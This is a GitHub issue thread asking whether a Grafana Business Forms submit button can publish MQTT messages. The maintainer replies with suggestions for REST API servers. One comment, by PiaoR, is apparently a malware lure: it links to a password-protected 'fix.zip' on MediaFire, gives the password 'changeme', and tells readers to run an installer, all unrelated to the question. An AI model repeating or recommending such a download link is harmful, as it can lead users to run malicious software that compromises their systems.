### ISSUE TITLE
business forms submit button on click publish MQTT message

### ISSUE THREAD

**Issue by tankienleong** [VolkovLabs/business-forms#476]
Publishing data directly to an MQTT broker is often essential for executing basic control functions, especially in home automation and IoT scenarios where an HTTP API might not be available. 

Is this achievable through the Business Form panel?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikhail-vl** [comment]
@tankienleong Business Forms can send update request to any Grafana Data source or REST API.

  Grafana has MQTT data source, but I don't think it supports executing commands: https://grafana.com/grafana/plugins/grafana-mqtt-datasource/

  Most probably, you should use custom REST API server like Node-RED for this.
  Please let us know how you implemented it.

**Comment by mikhail-vl** [comment]
We have multiple REST API server implementations: https://volkovlabs.io/plugins/business-forms/servers/
